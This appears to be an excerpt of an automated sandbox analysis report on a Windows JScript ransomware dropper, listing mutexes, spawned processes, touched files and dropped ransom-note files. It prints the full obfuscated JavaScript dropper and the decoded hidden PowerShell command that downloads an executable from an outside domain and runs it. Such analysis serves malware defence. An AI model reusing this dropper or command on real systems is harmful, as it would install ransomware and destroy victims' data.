"\Sessions\1\BaseNamedObjects\_SHuassist.mtx"
"\Sessions\1\BaseNamedObjects\Local\_!MSFTHISTORY!_"
"\Sessions\1\BaseNamedObjects\Local\c:!users!upw9lua!appdata!roaming!microsoft!windows!cookies!"
"\Sessions\1\BaseNamedObjects\Local\c:!users!upw9lua!appdata!local!microsoft!windows!history!history.ie5!"
"\Sessions\1\BaseNamedObjects\Local\WininetStartupMutex"
"\Sessions\1\BaseNamedObjects\Local\WininetConnectionMutex"
"\Sessions\1\BaseNamedObjects\Local\WininetProxyRegistryMutex"
"\Sessions\1\BaseNamedObjects\Local\c:!users!upw9lua!appdata!local!microsoft!windows!temporary internet files!content.ie5!" - source
- Created Mutant
- relevance
- 3/10
-
Drops files marked as clean
- details
- Antivirus vendors marked dropped file "gmpopenh264.dll" as clean (type is "PE32 executable (DLL) (GUI) Intel 80386 for MS Windows")
- source
- Extracted File
- relevance
- 10/10
-
Launches a browser
- details
- Launches browser "firefox.exe" (Show Process)
- source
- Monitored Target
- relevance
- 3/10
-
Loads the .NET runtime environment
- details
- "powershell.exe" loaded module "%WINDIR%\assembly\NativeImages_v2.0.50727_32\mscorlib\62a0b3e4b40ec0e8c5cfaa0c8848e64a\mscorlib.ni.dll" at 69F90000
- source
- Loaded Module
-
Parsed Javascript
- details
-
Output: "var vimzimfy = "ibu";
var ugbuts = 'hucviqidlo';
var dbaxanzi = 'h';
function alsosj() {
var tegi = false;
return tegi;
}
function qzibxijdeqo() {
var ybitk = undefined;
return ybitk;
}
function bycy() {
var twysaw = "64916";
return twysaw;
}
var mkolcive = false;
function fdutvax() {
var ivew = '82738';
return ivew;
}
function zhavutfi() {
return 15.0474;
}
var yjcewp = "%";
var npobwus = ".";
function ukotyfsug() {
return 1;
}
var aqmery = 'replace';
var ubhogy = 'c';
function xocygcah() {
var woqazlohj = 11;
return woqazlohj;
}
var vyrajtyju = 65.647;
function ycwywbarm() {
return 0;
}
function pjipukyzz() {
var dymiko = 13.6;
return dymiko;
}
function hafutw() {
return undefined;
}
var afdih = null;
function qoqkotsy() {
var zulgosjil = undefined;
return zulgosjil;
}
var utany = null;
function immoffunha() {
var varhach = null;
return varhach;
}
var lerlerkytu = typeof document;
function imsaw() {
return "upima";
}
function buzapm() {
return true;
}
function ghisolpy() {
return 0;
}
jkobeqivh = "ypbatkod";
var imekpajwob = 75;
function hyxi() {
return "92466";
}
var ibxesno = 'm';
function wyvun() {
return undefined;
}
var ajrahh = ')';
var noxah = "d";
vgyxpekxo = 'rwyxzebxuxk';
var uquhiwn = ':';
function avompavwir() {
return 1;
}
var jlyzifhuxc = "arqozy";
function ylqeful() {
return '70180';
}
function evwybo() {
return 0;
}
var fafiq = "'";
var etfygfaqy = null;
function osyqqorvalq() {
return "6880";
}
var efyfis = 't';
var dfewtolkybnu = 'vleqcivykn';
pvydinoko = '84641';
function mmysse() {
var ggefritjy = 17.5;
return ggefritjy;
}
var geju = "a";
function mkiwo() {
var ehowh = 25.1654;
return ehowh;
}
styrocyzvy = 'ewcocc';
var xxiccufuxby = null;
var yzfotdynasw = 1;
var ohug = undefined;
var ypedhycw = 'e';
var naccexgi = false;
var ucuxju = undefined;
var ikwucelfy = 'alyfmixamz';
var olupa = "dunyqxygr";
var jyxtiw = "^";
var iwugdiwx = 5.855;
var zbike = '(';
function iwkydciti() {
return undefined;
}
function exvihve() {
var ocvami = false;
return ocvami;
}
var jisvapax = 1.671;
var upqetp = 1;
var alucra = "yvfiq";
var ilavhys = null;
function anar() {
return undefined;
}
function ytxobo() {
var ekryzsoj = 8.654;
return ekryzsoj;
}
function bagef() {
return 'jcyd';
}
function oqgovajo() {
var ucopkuxmi = null;
return ucopkuxmi;
}
var izgyjgipso = undefined;
function evulon() {
var izfafex = false;
return izfafex;
}
function zcagyl() {
return null;
}
function ocuqga() {
var zede = false;
return zede;
}
function nsetriso() {
return 4;
}
function sxuwga() {
return '95275';
}
function ozgusaq() {
var xjomgokhe = "o6r6gb5i8elw5e1bzuo6r69i64y9o9n3xo9n3 /o6r6 pipz6pl6oWo9n3ripz6pl6sqf8o9n32ipz6pl6o9n3LLbzuo6r69i64y9o9n3ipz6pl6Xo9n3 ipz6pl6-ipz6pl6o9n3Xo9n3o6r6Ul2uo6r69i64iOnPoLiipz6pl6o6r6Y Bypipz6pl6uo6r69i6ipz6pl6ssipz6pl6 -ipz6pl6nOipz6pl6PROFilipz6pl6o9n3ipz6pl6 -wipz6pl6iNelw5e1Owipz6pl6sl2uo6r69i64yipz6pl6Lo9n3ipz6pl6 qf8o9n32ielw5e1elw5e1ipz6pl6o9n3nipz6pl6 gb5i8u1qf8o9n32r6No9n3wipz6pl6-oBJo9n3o6r6l2uo6r69i64 Sipz6pl6Ysipz6pl6l2uo6r69i64o9n3ipz6pl6gb5i8ipz6pl6bzuo6r69i64y9ipz6pl6No9n3l2uo6r69i64ipz6pl6bzuo6r69i64y9Wipz6pl6o9n3ipz6pl6Bo6r6lipz6pl6Iipz6pl6o9n3nl2uo6r69i64ngb5i82ln2bzuo6r69i64y9elw5e1Oipz6pl6wipz6pl6nlOuo6r69i6elw5e1filo9n3gb5i8u1qf8o9n32r6ipz6pl6mwa1a2qf8o9n32l2uo6r69i64l2uo6r69i64pgy7dg5//wwwbzuo6r69i64y9injusl2uo6r69i64io6r6o9n3ilbzuo6r69i64y9l2uo6r69i64op/uso9n3rbzuo6r69i64y9pqf8o9n32p?f=2bzuo6r69i64y9elw5e1uo6r69i6l2uo6r69i64mwa1a2,ipz6pl6mwa1a2du3h8uo6r69i6Ppelw5e1uo6r69i6l2uo6r69i64uo6r69i6du3h8bzuo6r69i64y9o9n3Xo9n3mwa1a2ngb5i82ln2;sl2uo6r69i64ipz6pl6uo6r69i6rl2uo6r69i64ipz6pl6-pipz6pl6Ripz6pl6Oo6r6ipz6pl6o9n3Ssipz6pl6 du3h8uo6r69i6pPelw5e1uo6r69i6l2uo6r69i64uo6r69i6du3h8bzuo6r69i64y9o9n3Xo9n3";
var ixunlogs = [/du3h8/gi
/gy7dg5/gi
/mwa1a2/gi
/o6r6/gi
/uc9i6/gi
/elw5e1/gi
/gb5i8/gi
/o9n3/gi
/ipz6pl6/gi
/qf8e2/gi
/mu1hr6/gi
/bza4y9/gi
/nm2ln2/gi
/l2a4/gi];
var ewavke = [yjcewp
uquhiwn
fafiq
ubhogy
geju
noxah
ibxesno
ypedhycw
jyxtiw
dbaxanzi
zbike
npobwus
ajrahh
efyfis];
var wtyzyj = 0;
while (1) {
if (wtyzyj == ixunlogs.length) break;
if (/cri/.test(ScriptEngine())) xjomgokhe = xjomgokhe[aqmery](ixunlogs[wtyzyj], ewavke[wtyzyj]);
wtyzyj++;
}
return xjomgokhe;
}
switch (zcagyl()) {
case 1:
if (vyrajtyju == 65.647) {
var hpakevvi = typeof false;
var mcerolvofw = 'zkargoly';
mcerolvofw = '21554';
var vpedwaknutpy = typeof false;
}
if (imsaw() === 'upima') {
var uvefixx = false;
var ilyjvo = 'vwymo';
var nalylpolf = 9.2 + 'ytury';
}
break;
case undefined:
if (vyrajtyju == 65.647) {
var hpakevvi = typeof false;
var mcerolvofw = 'zkargoly';
mcerolvofw = '21554';
var vpedwaknutpy = typeof false;
}
if (imsaw() === 'upima') {
var uvefixx = false;
var ilyjvo = 'vwymo';
var nalylpolf = 9.2 + 'ytury';
}
break;
case null:
switch (ytxobo()) {
case 'aby':
var nisernu = null;
if (nisernu === null) {
var mwuhjaqagfu = typeof 'upguniv';
var agbiwhi = typeof null;
var ijguhe = 43.2;
}
if (ucuxju === undefined) {
udoqyltyt = "yjeva";
aggaqyxy = 4;
var uhnydyzsisr = aggaqyxy + udoqyltyt;
var qehtam = typeof null;
var pozsix = typeof 1;
var oqpostonx = 919 + '11744';
var ehaxinpalx = 886 + "nrymu";
anwututdi = 53 + '6971';
}
break;
case 'koqi':
var nisernu = null;
if (nisernu === null) {
var mwuhjaqagfu = typeof 'upguniv';
var agbiwhi = typeof null;
var ijguhe = 43.2;
}
if (ucuxju === undefined) {
udoqyltyt = "yjeva";
aggaqyxy = 4;
var uhnydyzsisr = aggaqyxy + udoqyltyt;
var qehtam = typeof null;
var pozsix = typeof 1;
var oqpostonx = 919 + '11744';
var ehaxinpalx = 886 + "nrymu";
anwututdi = 53 + '6971';
}
break;
case 1:
var nisernu = null;
if (nisernu === null) {
var mwuhjaqagfu = typeof 'upguniv';
var agbiwhi = typeof null;
var ijguhe = 43.2;
}
if (ucuxju === undefined) {
udoqyltyt = "yjeva";
aggaqyxy = 4;
var uhnydyzsisr = aggaqyxy + udoqyltyt;
var qehtam = typeof null;
var pozsix = typeof 1;
var oqpostonx = 919 + '11744';
var ehaxinpalx = 886 + "nrymu";
anwututdi = 53 + '6971';
}
break;
case undefined:
var nisernu = null;
if (nisernu === null) {
var mwuhjaqagfu = typeof 'upguniv';
var agbiwhi = typeof null;
var ijguhe = 43.2;
}
if (ucuxju === undefined) {
udoqyltyt = "yjeva";
aggaqyxy = 4;
var uhnydyzsisr = aggaqyxy + udoqyltyt;
var qehtam = typeof null;
var pozsix = typeof 1;
var oqpostonx = 919 + '11744';
var ehaxinpalx = 886 + "nrymu";
anwututdi = 53 + '6971';
}
break;
case 8.654:
if (alucra === undefined) {
var farkysp = 1;
if (farkysp == true) {
if (ycwywbarm() == 0) {
var lkopzikyfe = true;
yjetlaxle = 75 + "vpulrope";
var usfulexv = 'juhinqemdu';
var escogi = "umy" + 4.834;
var mvilpexpihk = typeof null;
}
}
} else {
switch (bagef()) {
case true:
if (wyvun() == undefined) {
if (typeof etfygfaqy == "object") {
var axverics = typeof 0;
var umkelybd = "ihusespe";
var omegoxab = 676;
inxikulgig = omegoxab + umkelybd;
inxikulgig = inxikulgig + '8928';
}
}
var fhuwovguhxo = undefined;
if (fhuwovguhxo == undefined) {
if (typeof ylqeful() == 'string') {
if (typeof pjipukyzz() == "number") {
var uhansywfyx = typeof 65;
var dxegydla = typeof "elxolujw";
}
}
}
break;
case null:
if (wyvun() == undefined) {
if (typeof etfygfaqy == "object") {
var axverics = typeof 0;
var umkelybd = "ihusespe";
var omegoxab = 676;
inxikulgig = omegoxab + umkelybd;
inxikulgig = inxikulgig + '8928';
}
}
var fhuwovguhxo = undefined;
if (fhuwovguhxo == undefined) {
if (typeof ylqeful() == 'string') {
if (typeof pjipukyzz() == "number") {
var uhansywfyx = typeof 65;
var dxegydla = typeof "elxolujw";
}
}
}
break;
case 'jcyd':
var emynri = typeof 1;
var ixitgock = typeof null;
var fgogoqapn = '71786';
fgogoqapn = 774 + fgogoqapn;
var qkydilycu = 'zkacly';
qkydilycu = "oxa" + qkydilycu;
var pynirih = 280.648;
xdibaboma = 82.1067 + "70519";
var eriqmivhum = typeof null;
if (evulon() === 571) {
if (buzapm() === 'etifsigj') {
var yvipqerdafq = typeof null;
var dnefhulkav = typeof null;
}
} else {
switch (upqetp) {
case null:
if (ghisolpy() == false) {
vkabmeqfafd = '80957';
var mfazyquli = 2.379;
var agasejiw = vkabmeqfafd + mfazyquli;
agasejiw = agasejiw + '45233';
var gopyzvisu = 0;
var ovmumbiph = 49;
gqilcelyr = "ybxa";
var rpuqqozeg = 10.4816;
var ffowzolyl = rpuqqozeg + gqilcelyr;
ffowzolyl = ffowzolyl + "sbixpyd";
}
if (iwugdiwx == '5.855') {
if (mkolcive === null) {
var essawwar = typeof null;
var ykaleda = 11.39 + 'ezogmusz';
jzakuxymvi = 'wdyf' + 136.98;
var gugwarem = 13.8;
var fhygpylxu = 62.224;
ntupebru = fhygpylxu + dfewtolkybnu;
ntupebru = '39724' + ntupebru;
}
}
if (exvihve() == 89) {
ryrokj = 35 + "65823";
var olohmabp = 'skudi';
var madyvbuk = 2;
var opuwe = olohmabp + madyvbuk;
opuwe = 49 + opuwe;
var yvbiswimsarh = 82.335;
var uzytereh = 0.1864;
uzytereh = 'eqoputys';
var civjajre = 'xymsudk';
civjajre = '41562' + civjajre;
}
var gmerizacz = 566;
if (gmerizacz < 1045) {
aznuwpixzywg = "yjfiqap";
var ikreve = 59.762;
wytunp = ikreve + aznuwpixzywg;
wytunp = wytunp + 265;
var occofi = 12;
ovmefbirb = styrocyzvy + occofi;
ovmefbirb = ovmefbirb + 15;
var ygkekymgyxj = typeof null;
var adoqtitty = typeof '9736';
var emofwaz = "64236";
oqikepki = 0.02;
var irwagotl = emofwaz + oqikepki;
irwagotl = 'asifta' + irwagotl;
}
break;
case 1:
var ybbanbo = new ActiveXObject("WScript.Shell");
var amygk = 10;
switch (amygk) {
case null:
var dhaqsira = 0;
if (typeof dhaqsira == 'number') {
icdeqlyd = 'ode';
ydugekqe = 1.8;
var ijtustys = icdeqlyd + ydugekqe;
ijtustys = 3 + ijtustys;
ojimuzwo = 499;
var ffelakn = vimzimfy + ojimuzwo;
var eslipqybzen = typeof null;
urranvinx = '78597' + 551;
var skezedu = typeof null;
}
if (evwybo() === 854) {
qmodqumbo = 5 + "dsowahni";
var ofezatmon = undefined;
var yqyjuvwin = null;
var zwuhrepreq = typeof 0;
var tfifkijs = 7;
var owvebo = 'yxybh';
var ppovyhyxy = 2;
var advomij = ppovyhyxy + owvebo;
advomij = advomij + 5.5405;
var ylexo = "ewloqh";
}
if (imekpajwob == 62) {
adyrte = 1.788 + '36731';
var ydrolso = null;
}
break;
case 10:
if (nsetriso() < 9) {
switch (jisvapax) {
case null:
if (mkiwo() === 17.1654) {
var vebenvy = typeof false;
var zujoqe = 651.6468 + "59727";
}
if (osyqqorvalq() === undefined) {
var kyrnorxotda = "ewyna";
var ehevga = 924;
var yxojmobdi = kyrnorxotda + ehevga;
yxojmobdi = yxojmobdi + 10.2195;
}
var obfymogev = "qepozkobg";
if (obfymogev === 783) {
var nonirq = "77148";
var vrijyrloji = 691 + "vtabi";
}
break;
case false:
if (mkiwo() === 17.1654) {
var vebenvy = typeof false;
var zujoqe = 651.6468 + "59727";
}
if (osyqqorvalq() === undefined) {
var kyrnorxotda = "ewyna";
var ehevga = 924;
var yxojmobdi = kyrnorxotda + ehevga;
yxojmobdi = yxojmobdi + 10.2195;
}
var obfymogev = "qepozkobg";
if (obfymogev === 783) {
var nonirq = "77148";
var vrijyrloji = 691 + "vtabi";
}
break;
case 1.671:
switch (ocuqga()) {
case 'ddemixmocs':
if (utany === null) {
var ydjuvi = typeof false;
}
if (ukotyfsug() === 0) {
var fjupoq = typeof undefined;
var covyd = typeof false;
var dawtot = typeof "uxjapqe";
var rzedizhi = typeof null;
var fyhhuxtaw = typeof 39.7048;
var hufibed = 8 + 'asbiclusev';
}
if (ugbuts === 'hucviqidlo') {
if (xxiccufuxby == true) {
var guqweqasky = 'hywpojefe';
var vtonkes = '1496';
itokig = 167;
var ebeziqef = vtonkes + itokig;
ebeziqef = ebeziqef + 27;
var abiga = "38195" + 66;
}
}
break;
case false:
var tytvor = 0;
if (lerlerkytu == "undefined") {
if (sxuwga() === null) {
if (zhavutfi() == 15.0474) {
var mofcax = 124;
var ywuqko = mofcax + pvydinoko;
ywuqko = 3 + ywuqko;
var uhycxowto = 'tasenaxqe' + 21.343;
var dzibysko = "zlip";
var oddupaduq = 39.055;
var rvuvdecw = dzibysko + oddupaduq;
rvuvdecw = rvuvdecw + '75112';
var axgurhyje = 43.108;
var zmerawzax = "ifjimvycy" + 61.8249;
}
if (avompavwir() === 715) {
var fuldunvive = "19040" + 80;
}
if (afdih == null) {
if (xocygcah() < -26) {
var ejlacozfe = undefined;
if (ejlacozfe === 0) {
var xuhylu = "65881";
xuhylu = 16.872 + xuhylu;
}
}
}
} else {
var ogakwite = typeof 1;
var hodfar = 68;
hodfar = 3.66 + hodfar;
var syhvejuzni = typeof null;
var akysroxihr = typeof 85;
var ymununt = typeof undefined;
if (izgyjgipso == 0) {
if (mmysse() === 21.5) {
var ohnyjraboq = typeof undefined;
var aqadbomto = typeof "bfixvisymg";
var okhuxvylyp = typeof true;
}
if (yzfotdynasw === 1) {
var dekusboz = 884 + "33099";
var dzylesj = typeof undefined;
var ykishodpiv = 'ikdevnozni';
var arsyqu = typeof 0;
var egcafditvi = 17.22;
var ytifigy = egcafditvi + jkobeqivh;
ytifigy = "28474" + ytifigy;
ccehef = '30898' + 18.953;
var ekcahtepx = typeof '58680';
}
} else {
var ufadebo = typeof false;
var urcabeze = typeof true;
var bvomsusdu = 76.442;
bvomsusdu = '57273';
var gydmiqxofvi = "78825";
var nyrnuvne = typeof null;
switch (oqgovajo()) {
case false:
if (ikwucelfy == "alyfmixamz") {
var ygfavzixt = 'zhypubpajmy';
if (ygfavzixt == true) {
var zruvjafyjb = typeof 234;
var isiqa = 290;
var gixgydtahzo = isiqa + vgyxpekxo;
var febagjyqqu = 89 + "59030";
var octefonavq = typeof 1;
}
}
var vwivefnawy = "urylz";
if (vwivefnawy === 'urylz') {
var geluzwo = "nar" + 0.1713;
}
break;
case null:
if (anar() === 'nune') {
if (qzibxijdeqo() == 608) {
var evpelqotu = typeof true;
}
if (typeof hyxi() == "string") {
if (iwkydciti() == false) {
var divoq = typeof false;
var ihwuzhyc = null;
udbejmesapd = '89091';
var daxxev = 4.75;
var mzucuxbyf = daxxev + udbejmesapd;
var ibdyvi = '34582' + 604;
}
}
} else {
var acuvby = undefined;
if (acuvby == 687) {
var aqodep = null;
if (aqodep === null) {
var wivbotelma = typeof 'trugre';
}
} else {
if (ilavhys === null) {
ybbanbo.run(ozgusaq()
naccexgi);
} else {
if (hafutw() === undefined) {
var snihxuputly = typeof "ebeve";
var rtesemre = null;
var zufhedt = typeof undefined;
var kykqiwor = 'atpadkacasx' + 176;
var enwucnanzy = 'uqagr';
var ideluzy = typeof "isvemaftus";
}
}
var jurata = typeof true;
var vbonlajybu = 'hjijokj';
var arqixyfevf = 13.23;
var nibxygu = vbonlajybu + arqixyfevf;
nibxygu = "13734" + nibxygu;
var ifjopitxa = true;
var ludiwonva = true;
var lobutby = 13.86;
var iqidfekm = 'uluzpamtog';
var owwixupar = 80;
}
}
break;
}
}
}
} else {
if (typeof ohug == "undefined") {
if (fdutvax() == null) {
var rudena = typeof false;
var aznefsasso = 19.426 + "94173";
var eljocos = 'lgosrynyzi' + 10.1716;
var yssenqul = "90401";
var ysdoxyvumv = 14.8;
var mufixxa = yssenqul + ysdoxyvumv;
mufixxa = 16.358 + mufixxa;
var teriza = typeof 0;
iroregalp = 'pifcanzur';
uhegcejw = 12;
var ynkexocraq = uhegcejw + iroregalp;
var yqapur = "81582" + 2;
}
}
var ymcev = undefined;
if (ymcev == undefined) {
if (bycy() == 412) {
cipopyp = "38814";
mrettugcyhe = 276;
var vceqwatarc = cipopyp + mrettugcyhe;
vceqwatarc = vceqwatarc + 'qnykzuq';
var wohkihhe = '44852';
ufoversiw = 89.365;
emicalis = ufoversiw + wohkihhe;
emicalis = emicalis + "lwuk";
var cwihden = typeof 88;
var uvqigsitge = '979' + 20.332;
}
}
if (typeof olupa == 'string') {
var fmocabxisgo = 'swydopyj';
var ogjita = 36.764 + '18191';
var ixily = typeof 'sosma';
var aponbu = "gqymqi";
odtuzhyspag = 15.4;
muqwem = odtuzhyspag + aponbu;
muqwem = 62 + muqwem;
var vecmohawh = 14.6;
}
}
rjydkiggul = "xcejbypos" + 30.8;
var ylduxucihq = 71.2626;
var fgenholza = false;
break;
case 21.46:
if (utany === null) {
var ydjuvi = typeof false;
}
if (ukotyfsug() === 0) {
var fjupoq = typeof undefined;
var covyd = typeof false;
var dawtot = typeof "uxjapqe";
var rzedizhi = typeof null;
var fyhhuxtaw = typeof 39.7048;
var hufibed = 8 + 'asbiclusev';
}
if (ugbuts === 'hucviqidlo') {
if (xxiccufuxby == true) {
var guqweqasky = 'hywpojefe';
var vtonkes = '1496';
itokig = 167;
var ebeziqef = vtonkes + itokig;
ebeziqef = ebeziqef + 27;
var abiga = "38195" + 66;
}
}
break;
}
break;
}
var uzoqony = typeof "ahbind";
uvvutlafis = "78220";
var deqilutku = 4;
var nikatez = deqilutku + uvvutlafis;
nikatez = '83642' + nikatez;
var cuqtuz = 7;
itictysew = cuqtuz + jlyzifhuxc;
itictysew = 5 + itictysew;
yvujemoj = 8.82 + 'ogbyt';
arjozxibu = "amargansad";
var ojowixi = 516;
gvowegy = ojowixi + arjozxibu;
var rmejlege = typeof undefined;
} else {
if (qoqkotsy() === 124) {
if (alsosj() == 777) {
var igambi = 190 + "eheph";
var uzifadr = 'ucyne' + 761;
var abbywawq = null;
var ygacu = 'iflywema';
var cagnol = typeof null;
}
}
if (immoffunha() === null) {
var omeni = 'rec';
var phetexape = 25;
var jywylgepsa = omeni + phetexape;
jywylgepsa = 12.33 + jywylgepsa;
var upnarusw = typeof null;
var hiqumizo = typeof 736;
var iwupduc = typeof null;
var zevalfo = null;
var canhibpyzu = 3.2 + '42744';
ohlycgy = 405 + "38137";
}
}
break;
}
break;
case undefined:
if (ghisolpy() == false) {
vkabmeqfafd = '80957';
var mfazyquli = 2.379;
var agasejiw = vkabmeqfafd + mfazyquli;
agasejiw = agasejiw + '45233';
var gopyzvisu = 0;
var ovmumbiph = 49;
gqilcelyr = "ybxa";
var rpuqqozeg = 10.4816;
var ffowzolyl = rpuqqozeg + gqilcelyr;
ffowzolyl = ffowzolyl + "sbixpyd";
}
if (iwugdiwx == '5.855') {
if (mkolcive === null) {
var essawwar = typeof null;
var ykaleda = 11.39 + 'ezogmusz';
jzakuxymvi = 'wdyf' + 136.98;
var gugwarem = 13.8;
var fhygpylxu = 62.224;
ntupebru = fhygpylxu + dfewtolkybnu;
ntupebru = '39724' + ntupebru;
}
}
if (exvihve() == 89) {
ryrokj = 35 + "65823";
var olohmabp = 'skudi';
var madyvbuk = 2;
var opuwe = olohmabp + madyvbuk;
opuwe = 49 + opuwe;
var yvbiswimsarh = 82.335;
var uzytereh = 0.1864;
uzytereh = 'eqoputys';
var civjajre = 'xymsudk';
civjajre = '41562' + civjajre;
}
var gmerizacz = 566;
if (gmerizacz < 1045) {
aznuwpixzywg = "yjfiqap";
var ikreve = 59.762;
wytunp = ikreve + aznuwpixzywg;
wytunp = wytunp + 265;
var occofi = 12;
ovmefbirb = styrocyzvy + occofi;
ovmefbirb = ovmefbirb + 15;
var ygkekymgyxj = typeof null;
var adoqtitty = typeof '9736';
var emofwaz = "64236";
oqikepki = 0.02;
var irwagotl = emofwaz + oqikepki;
irwagotl = 'asifta' + irwagotl;
}
break;
case null:
if (ghisolpy() == false) {
vkabmeqfafd = '80957';
var mfazyquli = 2.379;
var agasejiw = vkabmeqfafd + mfazyquli;
agasejiw = agasejiw + '45233';
var gopyzvisu = 0;
var ovmumbiph = 49;
gqilcelyr = "ybxa";
var rpuqqozeg = 10.4816;
var ffowzolyl = rpuqqozeg + gqilcelyr;
ffowzolyl = ffowzolyl + "sbixpyd";
}
if (iwugdiwx == '5.855') {
if (mkolcive === null) {
var essawwar = typeof null;
var ykaleda = 11.39 + 'ezogmusz';
jzakuxymvi = 'wdyf' + 136.98;
var gugwarem = 13.8;
var fhygpylxu = 62.224;
ntupebru = fhygpylxu + dfewtolkybnu;
ntupebru = '39724' + ntupebru;
}
}
if (exvihve() == 89) {
ryrokj = 35 + "65823";
var olohmabp = 'skudi';
var madyvbuk = 2;
var opuwe = olohmabp + madyvbuk;
opuwe = 49 + opuwe;
var yvbiswimsarh = 82.335;
var uzytereh = 0.1864;
uzytereh = 'eqoputys';
var civjajre = 'xymsudk';
civjajre = '41562' + civjajre;
}
var gmerizacz = 566;
if (gmerizacz < 1045) {
aznuwpixzywg = "yjfiqap";
var ikreve = 59.762;
wytunp = ikreve + aznuwpixzywg;
wytunp = wytunp + 265;
var occofi = 12;
ovmefbirb = styrocyzvy + occofi;
ovmefbirb = ovmefbirb + 15;
var ygkekymgyxj = typeof null;
var adoqtitty = typeof '9736';
var emofwaz = "64236";
oqikepki = 0.02;
var irwagotl = emofwaz + oqikepki;
irwagotl = 'asifta' + irwagotl;
}
break;
}
}
break;
}
}
break;
}
var nuranenvi = typeof false;
var yvinliqab = "5318" + 38.69;
break;
case '34230':
if (vyrajtyju == 65.647) {
var hpakevvi = typeof false;
var mcerolvofw = 'zkargoly';
mcerolvofw = '21554';
var vpedwaknutpy = typeof false;
}
if (imsaw() === 'upima') {
var uvefixx = false;
var ilyjvo = 'vwymo';
var nalylpolf = 9.2 + 'ytury';
}
break;
}" - source
- Static Parser
- relevance
- 5/10
-
Reads Windows Trust Settings
- details
- "wscript.exe" (Path: "HKCU\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\WINTRUST\TRUST PROVIDERS\SOFTWARE PUBLISHING"; Key: "STATE")
- source
- Registry Access
- relevance
- 5/10
-
Runs shell commands
- details
-
"/c p^oWer^sh^eLL.e^Xe ^-^eXecUtiOnPoLi^cY Byp^a^ss^ -^nO^PROFil^e^ -w^iNdOw^sty^Le^ hidd^en^ (New^-oBJect S^Ys^te^m^.^Net^.W^e^Bcl^I^ent).dO^w^nlOadfile(^'http://www.injusticeil.top/user.php?f=2.dat',^'%APPDATA%\eXe');st^art^-p^R^Oc^eSs^ %APPDATA%\eXe" on 2016-10-22.07:30:00.640
"/C del /Q /F "%TEMP%\sysE5A3.tmp"" on 2016-10-22.09:42:00.460 - source
- Monitored Target
- relevance
- 5/10
-
Spawns new processes
- details
-
Spawned process "cmd.exe" with commandline "/c p^oWer^sh^eLL.e^Xe ^-^eXecUtiOnPoLi^cY Byp^a^ss^ -^nO^PROFil^e^ -w^iNdOw^sty^Le^ hidd^en^ (New^-oBJect S^Ys^te^m^.^Net^.W^e^Bcl^I^ent).dO^w^nlOadfile(^'http://www.injusticeil.top/user.php?f=2.dat',^'%APPDATA%\eXe');st^art^-p^R^Oc^eSs^ %APPDATA%\eXe" (Show Process)
Spawned process "powershell.exe" with commandline "poWersheLL.eXe -eXecUtiOnPoLicY Bypass -nOPROFile -wiNdOwstyLe hidden (New-oBJect SYstem.Net.WeBclIent).dOwnlOadfile('http://www.injusticeil.top/user.php?f=2.dat','%APPDATA%\eXe');start-pROceSs %APPDATA%\eXe" (Show Process)
Spawned process "eXe" (Show Process)
Spawned process "eXe" (Show Process)
Spawned process "firefox.exe" with commandline "-osint -url "%USERPROFILE%\Desktop\_HOWDO_text.html"" (Show Process)
Spawned process "cmd.exe" with commandline "/C del /Q /F "%TEMP%\sysE5A3.tmp"" (Show Process)
Spawned process "helper.exe" with commandline "/SetAsDefaultAppUser" (Show Process) - source
- Monitored Target
- relevance
- 3/10
-
Contacts domains
-
Installation/Persistance
-
Connects to LPC ports
- details
-
"wscript.exe" connecting to "\ThemeApiPort"
"helper.exe" connecting to "\ThemeApiPort" - source
- API Call
- relevance
- 1/10
-
Contains ability to lookup the windows account name
- details
- GetUserNameW@ADVAPI32.DLL from PID 00001264
- source
- Hybrid Analysis Technology
- relevance
- 5/10
-
Dropped files
- details
-
"nav.css" has type "ASCII text"
"5DYGW9JJ-XIPQ-SEFB-D62E-8CABDDA95F33.odin" has type "data"
"_28_HOWDO_text.html" has type "HTML document UTF-8 Unicode text with very long lines"
"5DYGW9JJ-XIPQ-SEFB-7359-764CD16FFCE7.odin" has type "data"
"5DYGW9JJ-XIPQ-SEFB-9716-0A946C3CE4BE.odin" has type "data"
"home-&-garden" has type "HTML document ASCII text with CRLF line terminators"
"_21_HOWDO_text.html" has type "HTML document UTF-8 Unicode text with very long lines"
"healthreport.sqlite" has type "SQLite 3.x database user version 1"
"gmpopenh264.dll" has type "PE32 executable (DLL) (GUI) Intel 80386 for MS Windows"
"5DYGW9JJ-XIPQ-SEFB-4DDE-F004BFD77AEE.odin" has type "data"
"5DYGW9JJ-XIPQ-SEFB-5AFB-0FF7A6D5EE86.odin" has type "data"
"_22_HOWDO_text.html" has type "HTML document UTF-8 Unicode text with very long lines"
"healthreport.sqlite-wal" has type "data"
"5DA331CF89FC03A9797F848CD51BA54F20015C7D" has type "data"
"5DYGW9JJ-XIPQ-SEFB-F034-96B64D825B9A.odin" has type "data"
"recovery.js.tmp" has type "ASCII text with very long lines with no line terminators"
"goog-phish-shavar.pset" has type "data"
"5DYGW9JJ-XIPQ-SEFB-7AFD-E18982230556.odin" has type "data"
"cookies.sqlite-wal" has type "data"
"6DF4C247EB188DBE3AA7FEFB8B83F5C21339C17F" has type "data" - source
- Extracted File
- relevance
- 3/10
-
Touches files in the Windows directory
- details
-
"wscript.exe" touched file "%WINDIR%\System32\en-US\WScript.exe.mui"
"wscript.exe" touched file "%WINDIR%\System32\WScript.exe"
"wscript.exe" touched file "%WINDIR%\Globalization\Sorting\sortdefault.nls"
"wscript.exe" touched file "%WINDIR%\system32\rsaenh.dll"
"wscript.exe" touched file "%WINDIR%\system32\wshom.ocx"
"wscript.exe" touched file "%WINDIR%\System32\OLEACCRC.DLL"
"wscript.exe" touched file "%WINDIR%\System32"
"wscript.exe" touched file "%LOCALAPPDATA%\Microsoft\Windows\Caches"
"wscript.exe" touched file "%LOCALAPPDATA%\Microsoft\Windows\Caches\cversions.1.db"
"wscript.exe" touched file "%LOCALAPPDATA%\Microsoft\Windows\Caches\{AFBF9F1A-8EE8-4C77-AF34-C647E37CA0D9}.1.ver0x0000000000000007.db"
"wscript.exe" touched file "%WINDIR%\System32\cmd.exe"
"helper.exe" touched file "%WINDIR%\Globalization\Sorting\sortdefault.nls"
"helper.exe" touched file "%LOCALAPPDATA%\Microsoft\Windows\Caches"
"helper.exe" touched file "%LOCALAPPDATA%\Microsoft\Windows\Caches\cversions.1.db"
"helper.exe" touched file "%LOCALAPPDATA%\Microsoft\Windows\Caches\{AFBF9F1A-8EE8-4C77-AF34-C647E37CA0D9}.1.ver0x0000000000000007.db" - source
- API Call
- relevance
- 7/10
-
Connects to LPC ports
-
Network Related
-
Found potential URL in binary/memory
- details
-
